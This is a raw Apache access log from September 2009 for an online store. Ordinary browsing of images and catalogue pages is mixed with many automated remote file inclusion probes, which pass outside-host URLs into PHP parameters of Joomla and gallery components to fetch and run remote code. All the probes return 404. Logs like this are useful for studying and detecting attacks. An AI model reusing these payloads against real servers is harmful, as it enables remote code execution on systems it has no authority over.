113.22.190.146 - - [23/Sep/2009:00:56:33 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
209.59.12.99 - - [23/Sep/2009:00:56:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
113.22.190.146 - - [23/Sep/2009:00:56:33 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:36 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:38 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:38 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:38 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:38 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:39 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:39 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG HTTP/1.1" 200 76392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:42 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:42 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:43 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:43 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:43 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:43 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:44 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:44 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:44 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:44 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:44 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:44 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:44 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L21132F4D047860004C5701A+M37+ENG HTTP/1.1" 200 76387 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F410338B0004A8701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:46 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:47 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:52 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F4D047860004C5701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L21132F430DF8A00053B701A+M37+ENG HTTP/1.1" 200 59168 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F4D047860004C5701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:56 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F430DF8A00053B701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:56 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F430DF8A00053B701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:56 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F430DF8A00053B701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
61.100.5.136 - - [23/Sep/2009:00:56:56 -0400] "GET /logs/access_log.Q109082400/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
113.22.190.146 - - [23/Sep/2009:00:56:59 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F430DF8A00053B701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:57:00 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L21132F410FB8E000445701A+WEBSEQ(S0020):1+WEBPGN(S0070):193235+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS HTTP/1.1" 200 52782 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F430DF8A00053B701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:57:03 -0400] "GET /images/printheader.jpg HTTP/1.1" 200 11345 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L21132F410FB8E000445701A+WEBSEQ(S0020):1+WEBPGN(S0070):193235+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:57:07 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L21132F4B017840005D9701A+M37+ENG HTTP/1.1" 200 51610 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F430DF8A00053B701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:57:10 -0400] "GET /images/prev.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L21132F4B017840005D9701A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
210.115.58.73 - - [23/Sep/2009:00:57:19 -0400] "GET /logs/access_log.Q109081000//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
70.87.64.234 - - [23/Sep/2009:00:57:41 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [23/Sep/2009:00:57:41 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.125.74.87 - - [23/Sep/2009:00:57:42 -0400] "GET /logs/access_log.Q109081000//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:57:45 -0400] "GET /logs/access_log.Q109081000//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.125.74.87 - - [23/Sep/2009:00:57:48 -0400] "GET /logs/access_log.Q109051600//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:57:49 -0400] "GET /logs/access_log.Q109051600//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.125.74.87 - - [23/Sep/2009:00:58:32 -0400] "GET /logs/error_log.Q109082100//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:58:32 -0400] "GET /logs/error_log.Q109081000//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:58:36 -0400] "GET /logs/access_log.Q109080400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:58:36 -0400] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:58:42 -0400] "GET /logs/error_log.Q109082100//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.125.74.87 - - [23/Sep/2009:00:58:43 -0400] "GET /logs/error_log.Q109081000//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.125.74.87 - - [23/Sep/2009:00:58:48 -0400] "GET /logs/access_log.Q109080400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.125.74.87 - - [23/Sep/2009:00:58:48 -0400] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
203.130.232.108 - - [23/Sep/2009:00:59:32 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 284 "-" "libwww-perl/5.831"
203.130.232.108 - - [23/Sep/2009:00:59:33 -0400] "GET //administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 257 "-" "libwww-perl/5.831"
203.130.232.108 - - [23/Sep/2009:00:59:34 -0400] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 262 "-" "libwww-perl/5.831"
203.130.232.108 - - [23/Sep/2009:00:59:34 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 284 "-" "libwww-perl/5.831"
203.130.232.108 - - [23/Sep/2009:00:59:35 -0400] "GET /logs/error_log.Q109061400//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 283 "-" "libwww-perl/5.831"
203.130.232.108 - - [23/Sep/2009:00:59:35 -0400] "GET //administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 257 "-" "libwww-perl/5.831"
203.130.232.108 - - [23/Sep/2009:00:59:36 -0400] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 262 "-" "libwww-perl/5.831"
203.130.232.108 - - [23/Sep/2009:00:59:36 -0400] "GET /logs/error_log.Q109061400//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 283 "-" "libwww-perl/5.831"
121.125.74.87 - - [23/Sep/2009:00:59:44 -0400] "GET /logs/error_log.Q109080400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:59:44 -0400] "GET /logs/error_log.Q109051600//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:59:48 -0400] "GET /logs/error_log.Q109080400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.125.74.87 - - [23/Sep/2009:00:59:48 -0400] "GET /logs/error_log.Q109051600//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
203.130.232.108 - - [23/Sep/2009:00:59:51 -0400] "GET /logs/access_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 260 "-" "libwww-perl/5.831"
203.130.232.108 - - [23/Sep/2009:00:59:52 -0400] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
203.130.232.108 - - [23/Sep/2009:00:59:52 -0400] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 238 "-" "libwww-perl/5.831"
202.44.32.9 - - [23/Sep/2009:00:59:54 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 284 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:59:54 -0400] "GET //administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 257 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:59:55 -0400] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 262 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:59:55 -0400] "GET /logs/error_log.Q109061400//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 283 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:01:00:02 -0400] "GET /logs/access_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 260 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:01:00:03 -0400] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 233 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:01:00:03 -0400] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 238 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:01:00:04 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:01:00:04 -0400] "GET //administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:01:00:04 -0400] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.806"
204.152.199.34 - - [23/Sep/2009:05:12:36 -0400] "GET /logs/access_log.Q109071000%20%20//index.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:12:36 -0400] "GET //index.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:12:36 -0400] "GET /logs//index.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:12:36 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:12:36 -0400] "GET /logs/error_log.Q109061600%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:12:36 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:12:36 -0400] "GET /logs/access_log.Q109080200%20%20//index.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:12:36 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:12:44 -0400] "GET /logs/access_log.Q109082600%20%20//config/dbutil.bck.php?confdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:12:51 -0400] "GET /logs/error_log.Q109061600%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:12:51 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:12:51 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:12:51 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:13:29 -0400] "GET /logs/access_log.Q109071000//index.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:13:29 -0400] "GET /logs/access_log.Q109080200//index.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
